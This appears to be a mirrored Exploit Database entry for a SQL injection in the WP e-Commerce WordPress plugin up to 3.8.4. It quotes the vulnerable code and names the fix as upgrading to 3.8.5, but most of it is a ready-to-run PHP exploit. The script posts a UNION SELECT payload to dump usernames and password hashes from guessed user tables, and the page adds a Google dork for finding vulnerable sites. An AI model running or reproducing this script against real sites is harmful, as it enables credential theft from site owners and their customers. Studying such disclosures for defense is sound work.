WordPress Plugin E-Commerce 3.8.4 – SQL Injection

Exploit Database
164 阅读

作者： IHTeam

日期： 2011-08-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17613/

100

101

102

103

104

105

106

107

108

109

110

111

112

# Exploit Title: WP E-commerce plugin <= 3.8.4 Sql Injection

# Google Dork: inurl:page_id= “Your billing/contact details”

# Date: 18/07/2011

# Author: IHTeam

# Software Link: http://www.getshopped.org/

# Version: 3.8.4

# Tested on: 3.8.4

# Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/

<?php

WP e-Commerce <= 3.8.4 SQL Injection

Download link: http://wordpress.org/extend/plugins/wp-e-commerce/

Author contact: 29/06/2011

Exploit published: 18/07/2011

Bugged code (wpsc-theme/functions/wpsc-user_log_functions.php):

foreach ( (array)$_POST['collected_data'] as $value_id => $value ) {

$form_sql = "SELECT * FROM <code>" . WPSC_TABLE_CHECKOUT_FORMS . "</code> WHERE <code>id</code> = '$value_id' LIMIT 1";

$form_data = $wpdb->get_row( $form_sql, ARRAY_A );

FIX: Upgrade to version 3.8.5

Bug found by: IHTeam

For GetShopped as their security auditors

This code has been released under the authorization of GetShopped staff.

It will show user_login and user_pass of wp_users table;

Google Dork: inurl:page_id= "Your billing/contact details"

function help() {

echo "\n";

echo " -------------------WP e-Commerce <= 3.8.4 SQL Injection---------------\n\n";

echo " How to use: php wp-ecommerce.php host path page_id [table_name]\n\n";

echo " host = Domain name\n";

echo " path = Path of WordPress\n";

echo " page_id = Int value of the login page of WP e-commerce\n";

echo " table_name = Default is wp_users\n\n";

echo " Example: php wp-commerce.php www.domain.com /wordpress/ 11 wp_users\n\n";

echo " ----------------------------------------------------------------------\n\n";

}

function exploit($host,$path,$pageid,$table) {

$url = $host.$path."?page_id=".$pageid."&edit_profile=true";

$buggy_code=urlencode("-2' UNION ALL SELECT 2, concat(user_login,':',user_pass), 'email', 1, 1, null, 1, 2, 'billingfirstname', null, 0 from ".$table." WHERE

'1'='1");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,$url);

curl_setopt($ch, CURLOPT_POST, 3);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);

curl_setopt($ch, CURLOPT_TIMEOUT, 10);

curl_setopt($ch, CURLOPT_POSTFIELDS,"collected_data[".$buggy_code."]=&submit=Save+Profile&submitwpcheckout_profile=true");

$result= curl_exec ($ch);

curl_close ($ch);

echo "Now using table name: $table... ";

preg_match("/<span class=\"wpsc_error_msg_field_name\">(.*?)<\/span>.<br \/>/", $result, $matches);

if ( !isset($matches[1]) )

$msg="Wrong table name or not vulnerable\n";

else

$msg="Credential found: ".$matches[1]."\n";

return $msg;

}

if ( isset($argv[1]) && isset($argv[2]) && isset($argv[3]) ) {

if (isset($argv[4]))

$table = $argv[4];

else

$table = "wp_users";

$host = $argv[1];

$spos=strpos($host, "http://");

if(!is_int($spos)&&($spos==0))

$host="http://$host";

$path = $argv[2];

$pageid=(int)$argv[3];

/* Detecting the version, if possible */

$version = file_get_contents($host.$path.'wp-content/plugins/wp-e-commerce/readme.txt');

preg_match("/Stable tag: (.*)/", $version, $vmatch);

if ( !isset($vmatch[1]) )

$version="Not detectable\n";

else

$version=$vmatch[1];

echo "Version: ".$version."\n";

/* End of version detecting */

/* Executing exploit */

preg_match('/[^.]+\.[^.]+$/', $host, $hmatch);

$host_name=str_replace('http://','',$hmatch[0]);

$tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers','wordpressusers', $host_name.'_users', str_replace('.','',$host_name).'_users', str_replace('.','',$host_name).'users' );

foreach($tarray as $index => $val) {

echo exploit($host,$path,$pageid,$val);

}

/*End of exploit */

} else

help();